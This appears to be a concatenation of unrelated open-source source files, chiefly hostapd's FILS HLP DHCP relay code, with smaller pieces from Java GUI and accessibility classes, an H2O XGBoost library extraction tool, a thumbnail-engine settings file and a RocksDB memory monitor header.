        // nextPageSlot, previousPageSlot) were removed - autoboxing made them
        // dead code since a boxed primitive can never be null.
        Objects.requireNonNull(this.title, "title");
        Objects.requireNonNull(this.itemSlots, "itemSlots");
        Objects.requireNonNull(this.scheme, "scheme");
        Objects.requireNonNull(this.nextPageItem, "nextPageItem");
        Objects.requireNonNull(this.previousPageItem, "previousPageItem");
        return new PaginatedGui(content, player, this);
    }
}
3,030
6,098
<gh_stars>1000+ package water.tools; import hex.tree.xgboost.XGBoostExtension; import hex.tree.xgboost.util.NativeLibrary; import hex.tree.xgboost.util.NativeLibraryLoaderChain; import java.io.File; import java.io.IOException; public class XGBoostLibExtractTool { public static void main(String[] args) throws IOException { if (args.length != 1) { System.err.println("XGBoostLibExtractTool: Specify target directory where to extract XGBoost native libraries."); System.exit(-1); } File dir = new File(args[0]); if (!dir.exists()) { System.err.println("XGBoostLibExtractTool: Directory '" + dir.getAbsolutePath() + "' doesn't exist."); System.exit(-1); } NativeLibraryLoaderChain loader = XGBoostExtension.getLoader(); if (loader == null) { System.err.println("XGBoostLibExtractTool: Failed to locate native libraries."); System.exit(-1); } for (NativeLibrary lib : loader.getNativeLibs()) { if (!lib.isBundled()) continue; File libFile = lib.extractTo(dir); System.out.println("Extracted native library: " + libFile.getAbsolutePath()); } } }
539
630
<filename>tests/settings/wand.py from .default import * THUMBNAIL_ENGINE = 'sorl.thumbnail.engines.wand_engine.Engine'
47
2,759
// Copyright (c) YugaByte, Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except // in compliance with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software distributed under the License // is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express // or implied. See the License for the specific language governing permissions and limitations // under the License. // #ifndef YB_ROCKSDB_MEMORY_MONITOR_H #define YB_ROCKSDB_MEMORY_MONITOR_H #include <atomic> #include <functional> #include "yb/rocksdb/port/likely.h" namespace rocksdb { // Counts the total memory of the registered write_buffers, and notifies the // callback if the limit is exceeded. class MemoryMonitor { public: explicit MemoryMonitor(size_t limit, std::function<void()> exceeded_callback) : limit_(limit), exceeded_callback_(std::move(exceeded_callback)) {} ~MemoryMonitor() {} size_t memory_usage() const { return memory_used_.load(std::memory_order_relaxed); } size_t limit() const { return limit_; } bool Exceeded() const { return Exceeded(memory_usage()); } void ReservedMem(size_t mem) { auto new_value = memory_used_.fetch_add(mem, std::memory_order_release) + mem; if (UNLIKELY(Exceeded(new_value))) { exceeded_callback_(); } } void FreedMem(size_t mem) { memory_used_.fetch_sub(mem, std::memory_order_relaxed); } // No copying allowed MemoryMonitor(const MemoryMonitor&) = delete; void operator=(const MemoryMonitor&) = delete; private: bool Exceeded(size_t size) const { return limit() > 0 && size >= limit(); } const size_t limit_; const std::function<void()> exceeded_callback_; std::atomic<size_t> memory_used_ {0}; }; } // namespace rocksdb #endif // YB_ROCKSDB_MEMORY_MONITOR_H
656
1,104
<reponame>ArrowOS/android_external_wpa_supplicant_8 /* * FILS HLP request processing * Copyright (c) 2017, Qualcomm Atheros, Inc. * * This software may be distributed under the terms of the BSD license. * See README for more details. */ #include "utils/includes.h" #include "utils/common.h" #include "utils/eloop.h" #include "common/dhcp.h" #include "hostapd.h" #include "sta_info.h" #include "ieee802_11.h" #include "fils_hlp.h" static be16 ip_checksum(const void *buf, size_t len) { u32 sum = 0; const u16 *pos; for (pos = buf; len >= 2; len -= 2) sum += ntohs(*pos++); if (len) sum += ntohs(*pos << 8); sum = (sum >> 16) + (sum & 0xffff); sum += sum >> 16; return htons(~sum); } static int fils_dhcp_request(struct hostapd_data *hapd, struct sta_info *sta, struct dhcp_data *dhcpoffer, u8 *dhcpofferend) { u8 *pos, *end; struct dhcp_data *dhcp; struct sockaddr_in addr; ssize_t res; const u8 *server_id = NULL; if (!sta->hlp_dhcp_discover) { wpa_printf(MSG_DEBUG, "FILS: No pending HLP DHCPDISCOVER available"); return -1; } /* Convert to DHCPREQUEST, remove rapid commit option, replace requested * IP address option with yiaddr. 
*/ pos = wpabuf_mhead(sta->hlp_dhcp_discover); end = pos + wpabuf_len(sta->hlp_dhcp_discover); dhcp = (struct dhcp_data *) pos; pos = (u8 *) (dhcp + 1); pos += 4; /* skip magic */ while (pos < end && *pos != DHCP_OPT_END) { u8 opt, olen; opt = *pos++; if (opt == DHCP_OPT_PAD) continue; if (pos >= end) break; olen = *pos++; if (olen > end - pos) break; switch (opt) { case DHCP_OPT_MSG_TYPE: if (olen > 0) *pos = DHCPREQUEST; break; case DHCP_OPT_RAPID_COMMIT: case DHCP_OPT_REQUESTED_IP_ADDRESS: case DHCP_OPT_SERVER_ID: /* Remove option */ pos -= 2; os_memmove(pos, pos + 2 + olen, end - pos - 2 - olen); end -= 2 + olen; olen = 0; break; } pos += olen; } if (pos >= end || *pos != DHCP_OPT_END) { wpa_printf(MSG_DEBUG, "FILS: Could not update DHCPDISCOVER"); return -1; } sta->hlp_dhcp_discover->used = pos - (u8 *) dhcp; /* Copy Server ID option from DHCPOFFER to DHCPREQUEST */ pos = (u8 *) (dhcpoffer + 1); end = dhcpofferend; pos += 4; /* skip magic */ while (pos < end && *pos != DHCP_OPT_END) { u8 opt, olen; opt = *pos++; if (opt == DHCP_OPT_PAD) continue; if (pos >= end) break; olen = *pos++; if (olen > end - pos) break; switch (opt) { case DHCP_OPT_SERVER_ID: server_id = pos - 2; break; } pos += olen; } if (wpabuf_resize(&sta->hlp_dhcp_discover, 6 + 1 + (server_id ? 
2 + server_id[1] : 0))) return -1; if (server_id) wpabuf_put_data(sta->hlp_dhcp_discover, server_id, 2 + server_id[1]); wpabuf_put_u8(sta->hlp_dhcp_discover, DHCP_OPT_REQUESTED_IP_ADDRESS); wpabuf_put_u8(sta->hlp_dhcp_discover, 4); wpabuf_put_data(sta->hlp_dhcp_discover, &dhcpoffer->your_ip, 4); wpabuf_put_u8(sta->hlp_dhcp_discover, DHCP_OPT_END); os_memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = hapd->conf->dhcp_server.u.v4.s_addr; addr.sin_port = htons(hapd->conf->dhcp_server_port); res = sendto(hapd->dhcp_sock, wpabuf_head(sta->hlp_dhcp_discover), wpabuf_len(sta->hlp_dhcp_discover), 0, (const struct sockaddr *) &addr, sizeof(addr)); if (res < 0) { wpa_printf(MSG_ERROR, "FILS: DHCP sendto failed: %s", strerror(errno)); return -1; } wpa_printf(MSG_DEBUG, "FILS: Acting as DHCP rapid commit proxy for %s:%d", inet_ntoa(addr.sin_addr), ntohs(addr.sin_port)); wpabuf_free(sta->hlp_dhcp_discover); sta->hlp_dhcp_discover = NULL; sta->fils_dhcp_rapid_commit_proxy = 1; return 0; } static void fils_dhcp_handler(int sd, void *eloop_ctx, void *sock_ctx) { struct hostapd_data *hapd = sock_ctx; struct sta_info *sta; u8 buf[1500], *pos, *end, *end_opt = NULL; struct dhcp_data *dhcp; struct sockaddr_in addr; socklen_t addr_len; ssize_t res; u8 msgtype = 0; int rapid_commit = 0; struct ip *iph; struct udphdr *udph; struct wpabuf *resp; const u8 *rpos; size_t left, len; addr_len = sizeof(addr); res = recvfrom(sd, buf, sizeof(buf), 0, (struct sockaddr *) &addr, &addr_len); if (res < 0) { wpa_printf(MSG_DEBUG, "FILS: DHCP read failed: %s", strerror(errno)); return; } wpa_printf(MSG_DEBUG, "FILS: DHCP response from server %s:%d (len=%d)", inet_ntoa(addr.sin_addr), ntohs(addr.sin_port), (int) res); wpa_hexdump(MSG_MSGDUMP, "FILS: HLP - DHCP server response", buf, res); if ((size_t) res < sizeof(*dhcp)) return; dhcp = (struct dhcp_data *) buf; if (dhcp->op != 2) return; /* Not a BOOTREPLY */ if (dhcp->relay_ip != hapd->conf->own_ip_addr.u.v4.s_addr) { 
wpa_printf(MSG_DEBUG, "FILS: HLP - DHCP response to unknown relay address 0x%x", dhcp->relay_ip); return; } dhcp->relay_ip = 0; pos = (u8 *) (dhcp + 1); end = &buf[res]; if (end - pos < 4 || WPA_GET_BE32(pos) != DHCP_MAGIC) { wpa_printf(MSG_DEBUG, "FILS: HLP - no DHCP magic in response"); return; } pos += 4; wpa_hexdump(MSG_DEBUG, "FILS: HLP - DHCP options in response", pos, end - pos); while (pos < end && *pos != DHCP_OPT_END) { u8 opt, olen; opt = *pos++; if (opt == DHCP_OPT_PAD) continue; if (pos >= end) break; olen = *pos++; if (olen > end - pos) break; switch (opt) { case DHCP_OPT_MSG_TYPE: if (olen > 0) msgtype = pos[0]; break; case DHCP_OPT_RAPID_COMMIT: rapid_commit = 1; break; } pos += olen; } if (pos < end && *pos == DHCP_OPT_END) end_opt = pos; wpa_printf(MSG_DEBUG, "FILS: HLP - DHCP message type %u (rapid_commit=%d hw_addr=" MACSTR ")", msgtype, rapid_commit, MAC2STR(dhcp->hw_addr)); sta = ap_get_sta(hapd, dhcp->hw_addr); if (!sta || !sta->fils_pending_assoc_req) { wpa_printf(MSG_DEBUG, "FILS: No pending HLP DHCP exchange with hw_addr " MACSTR, MAC2STR(dhcp->hw_addr)); return; } if (hapd->conf->dhcp_rapid_commit_proxy && msgtype == DHCPOFFER && !rapid_commit) { /* Use hostapd to take care of 4-message exchange and convert * the final DHCPACK to rapid commit version. 
*/ if (fils_dhcp_request(hapd, sta, dhcp, end) == 0) return; /* failed, so send the server response as-is */ } else if (msgtype != DHCPACK) { wpa_printf(MSG_DEBUG, "FILS: No DHCPACK available from the server and cannot do rapid commit proxying"); } pos = buf; resp = wpabuf_alloc(2 * ETH_ALEN + 6 + 2 + sizeof(*iph) + sizeof(*udph) + (end - pos) + 2); if (!resp) return; wpabuf_put_data(resp, sta->addr, ETH_ALEN); wpabuf_put_data(resp, hapd->own_addr, ETH_ALEN); wpabuf_put_data(resp, "\xaa\xaa\x03\x00\x00\x00", 6); wpabuf_put_be16(resp, ETH_P_IP); iph = wpabuf_put(resp, sizeof(*iph)); iph->ip_v = 4; iph->ip_hl = sizeof(*iph) / 4; iph->ip_len = htons(sizeof(*iph) + sizeof(*udph) + (end - pos)); iph->ip_ttl = 1; iph->ip_p = 17; /* UDP */ iph->ip_src.s_addr = hapd->conf->dhcp_server.u.v4.s_addr; iph->ip_dst.s_addr = dhcp->client_ip; iph->ip_sum = ip_checksum(iph, sizeof(*iph)); udph = wpabuf_put(resp, sizeof(*udph)); udph->uh_sport = htons(DHCP_SERVER_PORT); udph->uh_dport = htons(DHCP_CLIENT_PORT); udph->uh_ulen = htons(sizeof(*udph) + (end - pos)); udph->uh_sum = htons(0x0000); /* TODO: calculate checksum */ if (hapd->conf->dhcp_rapid_commit_proxy && msgtype == DHCPACK && !rapid_commit && sta->fils_dhcp_rapid_commit_proxy && end_opt) { /* Add rapid commit option */ wpabuf_put_data(resp, pos, end_opt - pos); wpabuf_put_u8(resp, DHCP_OPT_RAPID_COMMIT); wpabuf_put_u8(resp, 0); wpabuf_put_data(resp, end_opt, end - end_opt); } else { wpabuf_put_data(resp, pos, end - pos); } if (wpabuf_resize(&sta->fils_hlp_resp, wpabuf_len(resp) + 2 * wpabuf_len(resp) / 255 + 100)) { wpabuf_free(resp); return; } rpos = wpabuf_head(resp); left = wpabuf_len(resp); wpabuf_put_u8(sta->fils_hlp_resp, WLAN_EID_EXTENSION); /* Element ID */ if (left <= 254) len = 1 + left; else len = 255; wpabuf_put_u8(sta->fils_hlp_resp, len); /* Length */ /* Element ID Extension */ wpabuf_put_u8(sta->fils_hlp_resp, WLAN_EID_EXT_FILS_HLP_CONTAINER); /* Destination MAC Address, Source MAC Address, HLP Packet. 
* HLP Packet is in MSDU format (i.e., including the LLC/SNAP header * when LPD is used). */ wpabuf_put_data(sta->fils_hlp_resp, rpos, len - 1); rpos += len - 1; left -= len - 1; while (left) { wpabuf_put_u8(sta->fils_hlp_resp, WLAN_EID_FRAGMENT); len = left > 255 ? 255 : left; wpabuf_put_u8(sta->fils_hlp_resp, len); wpabuf_put_data(sta->fils_hlp_resp, rpos, len); rpos += len; left -= len; } wpabuf_free(resp); if (sta->fils_drv_assoc_finish) hostapd_notify_assoc_fils_finish(hapd, sta); else fils_hlp_finish_assoc(hapd, sta); } static int fils_process_hlp_dhcp(struct hostapd_data *hapd, struct sta_info *sta, const u8 *msg, size_t len) { const struct dhcp_data *dhcp; struct wpabuf *dhcp_buf; struct dhcp_data *dhcp_msg; u8 msgtype = 0; int rapid_commit = 0; const u8 *pos = msg, *end; struct sockaddr_in addr; ssize_t res; if (len < sizeof(*dhcp)) return 0; dhcp = (const struct dhcp_data *) pos; end = pos + len; wpa_printf(MSG_DEBUG, "FILS: HLP request DHCP: op=%u htype=%u hlen=%u hops=%u xid=0x%x", dhcp->op, dhcp->htype, dhcp->hlen, dhcp->hops, ntohl(dhcp->xid)); pos += sizeof(*dhcp); if (dhcp->op != 1) return 0; /* Not a BOOTREQUEST */ if (end - pos < 4) return 0; if (WPA_GET_BE32(pos) != DHCP_MAGIC) { wpa_printf(MSG_DEBUG, "FILS: HLP - no DHCP magic"); return 0; } pos += 4; wpa_hexdump(MSG_DEBUG, "FILS: HLP - DHCP options", pos, end - pos); while (pos < end && *pos != DHCP_OPT_END) { u8 opt, olen; opt = *pos++; if (opt == DHCP_OPT_PAD) continue; if (pos >= end) break; olen = *pos++; if (olen > end - pos) break; switch (opt) { case DHCP_OPT_MSG_TYPE: if (olen > 0) msgtype = pos[0]; break; case DHCP_OPT_RAPID_COMMIT: rapid_commit = 1; break; } pos += olen; } wpa_printf(MSG_DEBUG, "FILS: HLP - DHCP message type %u", msgtype); if (msgtype != DHCPDISCOVER) return 0; if (hapd->conf->dhcp_server.af != AF_INET || hapd->conf->dhcp_server.u.v4.s_addr == 0) { wpa_printf(MSG_DEBUG, "FILS: HLP - no DHCPv4 server configured - drop request"); return 0; } if 
(hapd->conf->own_ip_addr.af != AF_INET || hapd->conf->own_ip_addr.u.v4.s_addr == 0) { wpa_printf(MSG_DEBUG, "FILS: HLP - no IPv4 own_ip_addr configured - drop request"); return 0; } if (hapd->dhcp_sock < 0) { int s; s = socket(AF_INET, SOCK_DGRAM, 0); if (s < 0) { wpa_printf(MSG_ERROR, "FILS: Failed to open DHCP socket: %s", strerror(errno)); return 0; } if (hapd->conf->dhcp_relay_port) { os_memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = hapd->conf->own_ip_addr.u.v4.s_addr; addr.sin_port = htons(hapd->conf->dhcp_relay_port); if (bind(s, (struct sockaddr *) &addr, sizeof(addr))) { wpa_printf(MSG_ERROR, "FILS: Failed to bind DHCP socket: %s", strerror(errno)); close(s); return 0; } } if (eloop_register_sock(s, EVENT_TYPE_READ, fils_dhcp_handler, NULL, hapd)) { close(s); return 0; } hapd->dhcp_sock = s; } dhcp_buf = wpabuf_alloc(len); if (!dhcp_buf) return 0; dhcp_msg = wpabuf_put(dhcp_buf, len); os_memcpy(dhcp_msg, msg, len); dhcp_msg->relay_ip = hapd->conf->own_ip_addr.u.v4.s_addr; os_memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = hapd->conf->dhcp_server.u.v4.s_addr; addr.sin_port = htons(hapd->conf->dhcp_server_port); res = sendto(hapd->dhcp_sock, dhcp_msg, len, 0, (const struct sockaddr *) &addr, sizeof(addr)); if (res < 0) { wpa_printf(MSG_ERROR, "FILS: DHCP sendto failed: %s", strerror(errno)); wpabuf_free(dhcp_buf); /* Close the socket to try to recover from error */ eloop_unregister_read_sock(hapd->dhcp_sock); close(hapd->dhcp_sock); hapd->dhcp_sock = -1; return 0; } wpa_printf(MSG_DEBUG, "FILS: HLP relayed DHCP request to server %s:%d (rapid_commit=%d)", inet_ntoa(addr.sin_addr), ntohs(addr.sin_port), rapid_commit); if (hapd->conf->dhcp_rapid_commit_proxy && rapid_commit) { /* Store a copy of the DHCPDISCOVER for rapid commit proxying * purposes if the server does not support the rapid commit * option. 
*/ wpa_printf(MSG_DEBUG, "FILS: Store DHCPDISCOVER for rapid commit proxy"); wpabuf_free(sta->hlp_dhcp_discover); sta->hlp_dhcp_discover = dhcp_buf; } else { wpabuf_free(dhcp_buf); } return 1; } static int fils_process_hlp_udp(struct hostapd_data *hapd, struct sta_info *sta, const u8 *dst, const u8 *pos, size_t len) { const struct ip *iph; const struct udphdr *udph; u16 sport, dport, ulen; if (len < sizeof(*iph) + sizeof(*udph)) return 0; iph = (const struct ip *) pos; udph = (const struct udphdr *) (iph + 1); sport = ntohs(udph->uh_sport); dport = ntohs(udph->uh_dport); ulen = ntohs(udph->uh_ulen); wpa_printf(MSG_DEBUG, "FILS: HLP request UDP: sport=%u dport=%u ulen=%u sum=0x%x", sport, dport, ulen, ntohs(udph->uh_sum)); /* TODO: Check UDP checksum */ if (ulen < sizeof(*udph) || ulen > len - sizeof(*iph)) return 0; if (dport == DHCP_SERVER_PORT && sport == DHCP_CLIENT_PORT) { return fils_process_hlp_dhcp(hapd, sta, (const u8 *) (udph + 1), ulen - sizeof(*udph)); } return 0; } static int fils_process_hlp_ip(struct hostapd_data *hapd, struct sta_info *sta, const u8 *dst, const u8 *pos, size_t len) { const struct ip *iph; uint16_t ip_len; if (len < sizeof(*iph)) return 0; iph = (const struct ip *) pos; if (ip_checksum(iph, sizeof(*iph)) != 0) { wpa_printf(MSG_DEBUG, "FILS: HLP request IPv4 packet had invalid header checksum - dropped"); return 0; } ip_len = ntohs(iph->ip_len); if (ip_len > len) return 0; wpa_printf(MSG_DEBUG, "FILS: HLP request IPv4: saddr=%08x daddr=%08x protocol=%u", iph->ip_src.s_addr, iph->ip_dst.s_addr, iph->ip_p); switch (iph->ip_p) { case 17: return fils_process_hlp_udp(hapd, sta, dst, pos, len); } return 0; } static int fils_process_hlp_req(struct hostapd_data *hapd, struct sta_info *sta, const u8 *pos, size_t len) { const u8 *pkt, *end; wpa_printf(MSG_DEBUG, "FILS: HLP request from " MACSTR " (dst=" MACSTR " src=" MACSTR " len=%u)", MAC2STR(sta->addr), MAC2STR(pos), MAC2STR(pos + ETH_ALEN), (unsigned int) len); if (os_memcmp(sta->addr, pos + 
ETH_ALEN, ETH_ALEN) != 0) { wpa_printf(MSG_DEBUG, "FILS: Ignore HLP request with unexpected source address" MACSTR, MAC2STR(pos + ETH_ALEN)); return 0; } end = pos + len; pkt = pos + 2 * ETH_ALEN; if (end - pkt >= 6 && os_memcmp(pkt, "\xaa\xaa\x03\x00\x00\x00", 6) == 0) pkt += 6; /* Remove SNAP/LLC header */ wpa_hexdump(MSG_MSGDUMP, "FILS: HLP request packet", pkt, end - pkt); if (end - pkt < 2) return 0; switch (WPA_GET_BE16(pkt)) { case ETH_P_IP: return fils_process_hlp_ip(hapd, sta, pos, pkt + 2, end - pkt - 2); } return 0; } int fils_process_hlp(struct hostapd_data *hapd, struct sta_info *sta, const u8 *pos, int left) { const u8 *end = pos + left; u8 *tmp, *tmp_pos; int ret = 0; if (sta->fils_pending_assoc_req && eloop_is_timeout_registered(fils_hlp_timeout, hapd, sta)) { /* Do not process FILS HLP request again if the station * retransmits (Re)Association Request frame before the previous * HLP response has either been received or timed out. */ wpa_printf(MSG_DEBUG, "FILS: Do not relay another HLP request from " MACSTR " before processing of the already pending one has been completed", MAC2STR(sta->addr)); return 1; } /* Old DHCPDISCOVER is not needed anymore, if it was still pending */ wpabuf_free(sta->hlp_dhcp_discover); sta->hlp_dhcp_discover = NULL; sta->fils_dhcp_rapid_commit_proxy = 0; /* Check if there are any FILS HLP Container elements */ while (end - pos >= 2) { if (2 + pos[1] > end - pos) return 0; if (pos[0] == WLAN_EID_EXTENSION && pos[1] >= 1 + 2 * ETH_ALEN && pos[2] == WLAN_EID_EXT_FILS_HLP_CONTAINER) break; pos += 2 + pos[1]; } if (end - pos < 2) return 0; /* No FILS HLP Container elements */ tmp = os_malloc(end - pos); if (!tmp) return 0; while (end - pos >= 2) { if (2 + pos[1] > end - pos || pos[0] != WLAN_EID_EXTENSION || pos[1] < 1 + 2 * ETH_ALEN || pos[2] != WLAN_EID_EXT_FILS_HLP_CONTAINER) break; tmp_pos = tmp; os_memcpy(tmp_pos, pos + 3, pos[1] - 1); tmp_pos += pos[1] - 1; pos += 2 + pos[1]; /* Add possible fragments */ while (end - pos 
>= 2 && pos[0] == WLAN_EID_FRAGMENT && 2 + pos[1] <= end - pos) { os_memcpy(tmp_pos, pos + 2, pos[1]); tmp_pos += pos[1]; pos += 2 + pos[1]; } if (fils_process_hlp_req(hapd, sta, tmp, tmp_pos - tmp) > 0) ret = 1; } os_free(tmp); return ret; } void fils_hlp_deinit(struct hostapd_data *hapd) { if (hapd->dhcp_sock >= 0) { eloop_unregister_read_sock(hapd->dhcp_sock); close(hapd->dhcp_sock); hapd->dhcp_sock = -1; } }
8,088
543
<gh_stars>100-1000 /* * Copyright (c) 1997, 2017, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package javax.accessibility; /** * Class {@code AccessibleRole} determines the role of a component. The role of * a component describes its generic function. (E.G., "push button," "table," or * "list.") * <p> * The {@link #toDisplayString()} method allows you to obtain the localized * string for a locale independent key from a predefined {@code ResourceBundle} * for the keys defined in this class. * <p> * The constants in this class present a strongly typed enumeration of common * object roles. A public constructor for this class has been purposely omitted * and applications should use one of the constants from this class. 
If the * constants in this class are not sufficient to describe the role of an object, * a subclass should be generated from this class and it should provide * constants in a similar manner. * * @author <NAME> * @author <NAME> * @author <NAME> */ public class AccessibleRole extends AccessibleBundle { // If you add or remove anything from here, make sure you // update AccessibleResourceBundle.java. /** * Object is used to alert the user about something. */ public static final AccessibleRole ALERT = new AccessibleRole("alert"); /** * The header for a column of data. */ public static final AccessibleRole COLUMN_HEADER = new AccessibleRole("columnheader"); /** * Object that can be drawn into and is used to trap events. * * @see #FRAME * @see #GLASS_PANE * @see #LAYERED_PANE */ public static final AccessibleRole CANVAS = new AccessibleRole("canvas"); /** * A list of choices the user can select from. Also optionally allows the * user to enter a choice of their own. */ public static final AccessibleRole COMBO_BOX = new AccessibleRole("combobox"); /** * An iconified internal frame in a {@code DESKTOP_PANE}. * * @see #DESKTOP_PANE * @see #INTERNAL_FRAME */ public static final AccessibleRole DESKTOP_ICON = new AccessibleRole("desktopicon"); /** * An object containing a collection of {@code Accessibles} that together * represents {@code HTML} content. The child {@code Accessibles} would * include objects implementing {@code AccessibleText}, * {@code AccessibleHypertext}, {@code AccessibleIcon}, and other * interfaces. * * @see #HYPERLINK * @see AccessibleText * @see AccessibleHypertext * @see AccessibleHyperlink * @see AccessibleIcon * @since 1.6 */ public static final AccessibleRole HTML_CONTAINER = new AccessibleRole("htmlcontainer"); /** * A frame-like object that is clipped by a desktop pane. The desktop pane, * internal frame, and desktop icon objects are often used to create * multiple document interfaces within an application. 
* * @see #DESKTOP_ICON * @see #DESKTOP_PANE * @see #FRAME */ public static final AccessibleRole INTERNAL_FRAME = new AccessibleRole("internalframe"); /** * A pane that supports internal frames and iconified versions of those * internal frames. * * @see #DESKTOP_ICON * @see #INTERNAL_FRAME */ public static final AccessibleRole DESKTOP_PANE = new AccessibleRole("desktoppane"); /** * A specialized pane whose primary use is inside a {@code DIALOG}. * * @see #DIALOG */ public static final AccessibleRole OPTION_PANE = new AccessibleRole("optionpane"); /** * A top level window with no title or border. * * @see #FRAME * @see #DIALOG */ public static final AccessibleRole WINDOW = new AccessibleRole("window"); /** * A top level window with a title bar, border, menu bar, etc. It is often * used as the primary window for an application. * * @see #DIALOG * @see #CANVAS * @see #WINDOW */ public static final AccessibleRole FRAME = new AccessibleRole("frame"); /** * A top level window with title bar and a border. A dialog is similar to a * frame, but it has fewer properties and is often used as a secondary * window for an application. * * @see #FRAME * @see #WINDOW */ public static final AccessibleRole DIALOG = new AccessibleRole("dialog"); /** * A specialized pane that lets the user choose a color. */ public static final AccessibleRole COLOR_CHOOSER = new AccessibleRole("colorchooser"); /** * A pane that allows the user to navigate through and select the contents * of a directory. May be used by a file chooser. * * @see #FILE_CHOOSER */ public static final AccessibleRole DIRECTORY_PANE = new AccessibleRole("directorypane"); /** * A specialized dialog that displays the files in the directory and lets * the user select a file, browse a different directory, or specify a * filename. May use the directory pane to show the contents of a directory. 
* * @see #DIRECTORY_PANE */ public static final AccessibleRole FILE_CHOOSER = new AccessibleRole("filechooser"); /** * An object that fills up space in a user interface. It is often used in * interfaces to tweak the spacing between components, but serves no other * purpose. */ public static final AccessibleRole FILLER = new AccessibleRole("filler"); /** * A hypertext anchor. */ public static final AccessibleRole HYPERLINK = new AccessibleRole("hyperlink"); /** * A small fixed size picture, typically used to decorate components. */ public static final AccessibleRole ICON = new AccessibleRole("icon"); /** * An object used to present an icon or short string in an interface. */ public static final AccessibleRole LABEL = new AccessibleRole("label"); /** * A specialized pane that has a glass pane and a layered pane as its * children. * * @see #GLASS_PANE * @see #LAYERED_PANE */ public static final AccessibleRole ROOT_PANE = new AccessibleRole("rootpane"); /** * A pane that is guaranteed to be painted on top of all panes beneath it. * * @see #ROOT_PANE * @see #CANVAS */ public static final AccessibleRole GLASS_PANE = new AccessibleRole("glasspane"); /** * A specialized pane that allows its children to be drawn in layers, * providing a form of stacking order. This is usually the pane that holds * the menu bar as well as the pane that contains most of the visual * components in a window. * * @see #GLASS_PANE * @see #ROOT_PANE */ public static final AccessibleRole LAYERED_PANE = new AccessibleRole("layeredpane"); /** * An object that presents a list of objects to the user and allows the user * to select one or more of them. A list is usually contained within a * scroll pane. * * @see #SCROLL_PANE * @see #LIST_ITEM */ public static final AccessibleRole LIST = new AccessibleRole("list"); /** * An object that presents an element in a list. A list is usually contained * within a scroll pane. 
* * @see #SCROLL_PANE * @see #LIST */ public static final AccessibleRole LIST_ITEM = new AccessibleRole("listitem"); /** * An object usually drawn at the top of the primary dialog box of an * application that contains a list of menus the user can choose from. For * example, a menu bar might contain menus for "File," "Edit," and "Help." * * @see #MENU * @see #POPUP_MENU * @see #LAYERED_PANE */ public static final AccessibleRole MENU_BAR = new AccessibleRole("menubar"); /** * A temporary window that is usually used to offer the user a list of * choices, and then hides when the user selects one of those choices. * * @see #MENU * @see #MENU_ITEM */ public static final AccessibleRole POPUP_MENU = new AccessibleRole("popupmenu"); /** * An object usually found inside a menu bar that contains a list of actions * the user can choose from. A menu can have any object as its children, but * most often they are menu items, other menus, or rudimentary objects such * as radio buttons, check boxes, or separators. For example, an application * may have an "Edit" menu that contains menu items for "Cut" and "Paste." * * @see #MENU_BAR * @see #MENU_ITEM * @see #SEPARATOR * @see #RADIO_BUTTON * @see #CHECK_BOX * @see #POPUP_MENU */ public static final AccessibleRole MENU = new AccessibleRole("menu"); /** * An object usually contained in a menu that presents an action the user * can choose. For example, the "Cut" menu item in an "Edit" menu would be * an action the user can select to cut the selected area of text in a * document. * * @see #MENU_BAR * @see #SEPARATOR * @see #POPUP_MENU */ public static final AccessibleRole MENU_ITEM = new AccessibleRole("menuitem"); /** * An object usually contained in a menu to provide a visual and logical * separation of the contents in a menu. For example, the "File" menu of an * application might contain menu items for "Open," "Close," and "Exit," and * will place a separator between "Close" and "Exit" menu items. 
* * @see #MENU * @see #MENU_ITEM */ public static final AccessibleRole SEPARATOR = new AccessibleRole("separator"); /** * An object that presents a series of panels (or page tabs), one at a time, * through some mechanism provided by the object. The most common mechanism * is a list of tabs at the top of the panel. The children of a page tab * list are all page tabs. * * @see #PAGE_TAB */ public static final AccessibleRole PAGE_TAB_LIST = new AccessibleRole("pagetablist"); /** * An object that is a child of a page tab list. Its sole child is the panel * that is to be presented to the user when the user selects the page tab * from the list of tabs in the page tab list. * * @see #PAGE_TAB_LIST */ public static final AccessibleRole PAGE_TAB = new AccessibleRole("pagetab"); /** * A generic container that is often used to group objects. */ public static final AccessibleRole PANEL = new AccessibleRole("panel"); /** * An object used to indicate how much of a task has been completed. */ public static final AccessibleRole PROGRESS_BAR = new AccessibleRole("progressbar"); /** * A text object used for passwords, or other places where the text contents * is not shown visibly to the user. */ public static final AccessibleRole PASSWORD_TEXT = new AccessibleRole("passwordtext"); /** * An object the user can manipulate to tell the application to do * something. * * @see #CHECK_BOX * @see #TOGGLE_BUTTON * @see #RADIO_BUTTON */ public static final AccessibleRole PUSH_BUTTON = new AccessibleRole("pushbutton"); /** * A specialized push button that can be checked or unchecked, but does not * provide a separate indicator for the current state. * * @see #PUSH_BUTTON * @see #CHECK_BOX * @see #RADIO_BUTTON */ public static final AccessibleRole TOGGLE_BUTTON = new AccessibleRole("togglebutton"); /** * A choice that can be checked or unchecked and provides a separate * indicator for the current state. 
